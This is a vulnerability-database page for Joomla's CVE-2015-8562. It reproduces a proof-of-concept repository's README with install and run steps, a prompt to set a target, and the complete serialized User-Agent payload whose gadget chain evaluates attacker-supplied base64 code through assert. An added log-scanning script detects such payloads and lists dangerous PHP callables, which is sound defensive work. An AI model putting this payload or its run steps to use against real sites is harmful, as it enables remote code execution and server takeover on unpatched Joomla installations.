Related vulnerability
Title:
Joomla! Core remote code execution vulnerability
(CVE-2015-8562)
Description: Joomla! is an open-source, cross-platform content management system (CMS) written in PHP and MySQL by the US team Open Source Matters. Joomla! contains a security vulnerability: a remote attacker can use the HTTP User-Agent header to carry out a PHP object injection attack and execute arbitrary PHP code. Affected versions: Joomla! 1.5.x, 2.x, and 3.x before 3.4.6. (Widely exploited in December 2015.)
Description
A proof of concept for Joomla's CVE-2015-8562 vulnerability
Introduction
# Joomla-CVE-2015-8562-PHP-POC
A proof of concept for Joomla's CVE-2015-8562 vulnerability

## Intro
This PoC is a near 1:1 copy of Gary's python implementation hosted at [exploit-db](https://www.exploit-db.com/exploits/38977/).
## Use it
It's very easy to install:
```
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
```
Once composer has everything installed you'll need to change `$target` in `exploit.php`.
After that you're ready to go:
```
php exploit.php
```
### CVE-2015-8562
In December 2015 a vulnerability was found in Joomla. It allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.
This vulnerability hit *all* versions of Joomla. A patch for v1.5.x, v2.5.x and v3.x has already been [released](https://github.com/joomla/joomla-cms/releases/tag/3.4.6).
If you are running PHP >= 5.4.45, >= 5.5.29 or >= 5.6.13 you are fine, as this exploit also relies on [CVE-2015-6835](https://bugs.php.net/bug.php?id=70219).
Nikos Verschore from PatrolServer wrote a very detailed [blog post](https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/) and was a major help in understanding this vulnerability. You can use their [mini-scanner](https://scan.patrolserver.com/joomla/CVE-2015-8562) for free to check if your site is at risk.
#### The real exploit
This is what the sent `User-Agent` header looks like:
```
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}
```
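As an added defensive example (not part of this repository or the original PoC), the following Python scans web-server access log lines for User-Agent values shaped like the payload above: serialized PHP objects, the Joomla gadget class names, NUL-prefixed (non-public) member names and callables such as `assert` stored as strings. The Apache combined log format, the convention that NUL bytes are logged as `\x00`, and the two sample log lines are assumptions constructed for the demonstration.

```python
import re
# A serialized PHP object: O:<len>:"<class>":<member count>:{ ... }
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z_][A-Za-z0-9_\\]*)":\d+:\{')
# Non-public members carry a NUL-prefixed name. Assumption: the server logs a raw NUL
# as \x00 (Apache style); a raw NUL and a literal \0 are accepted as well.
NUL_MEMBER_RE = re.compile(r's:\d+:"(?:\x00|\\x00|\\0){3}')
# Classes from the public gadget chain for this CVE (see the payload above)
GADGET_CLASSES = {"JDatabaseDriverMysqli", "JSimplepieFactory", "SimplePie", "JDatabaseDriverMysql"}
# Callables that have no business appearing as a serialized string in a User-Agent
SUSPICIOUS_CALLABLES = ("assert", "eval", "system", "exec", "passthru", "shell_exec")

def scan_user_agent(ua):
    """Return the list of findings for one User-Agent value; empty means clean."""
    findings = []
    classes = PHP_OBJECT_RE.findall(ua)
    if classes:
        findings.append("serialized PHP object: " + ", ".join(classes))
    gadgets = sorted(GADGET_CLASSES.intersection(classes))
    if gadgets:
        findings.append("Joomla gadget class: " + ", ".join(gadgets))
    if NUL_MEMBER_RE.search(ua):
        findings.append("NUL-prefixed member name (protected/private property)")
    for name in SUSPICIOUS_CALLABLES:
        if re.search(r's:%d:"%s"' % (len(name), name), ua):
            findings.append("callable as string: " + name)
    return findings

# Apache "combined" format (assumed). The User-Agent is the last quoted field and may
# contain escaped quotes (\"), so it is matched greedily and unescaped before scanning.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>.*)"$')

def scan_log_lines(lines):
    """Return [(client_ip, findings)] for every line whose User-Agent trips a rule."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings = scan_user_agent(m.group("ua").replace('\\"', '"'))
            if findings:
                alerts.append((m.group("ip"), findings))
    return alerts

# Constructed sample traffic (not captured data): a browser request, then a request
# carrying a truncated gadget chain shaped like the payload above, NULs logged as \x00.
MALICIOUS_UA = ('}__x|O:21:"JDatabaseDriverMysqli":3:{s:4:"\\x00\\x00\\x00a";O:17:"JSimplepieFactory":0:{}'
                's:21:"\\x00\\x00\\x00disconnectHandlers";a:1:{i:0;O:9:"SimplePie":1:{s:19:"cache_name_function";'
                's:6:"assert";}}s:13:"\\x00\\x00\\x00connection";i:1;}')
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Dec/2015:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"',
    '203.0.113.9 - - [17/Dec/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "' + MALICIOUS_UA.replace('"', '\\"') + '"',
]
```

Running `scan_log_lines(SAMPLE_LOG)` reports only the second client, with all four rules firing; a serialized object in a User-Agent is rare enough in legitimate traffic that the first rule alone is worth alerting on.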
File snapshot
```
[4.0K] /data/pocs/70c0872880a9b0dee9391cacaad4791f0cf7f061
├── [ 333] composer.json
├── [1.5K] exploit.php
├── [1.1K] LICENSE
└── [2.1K] README.md
0 directories, 4 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is gone or unreachable, send an email to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.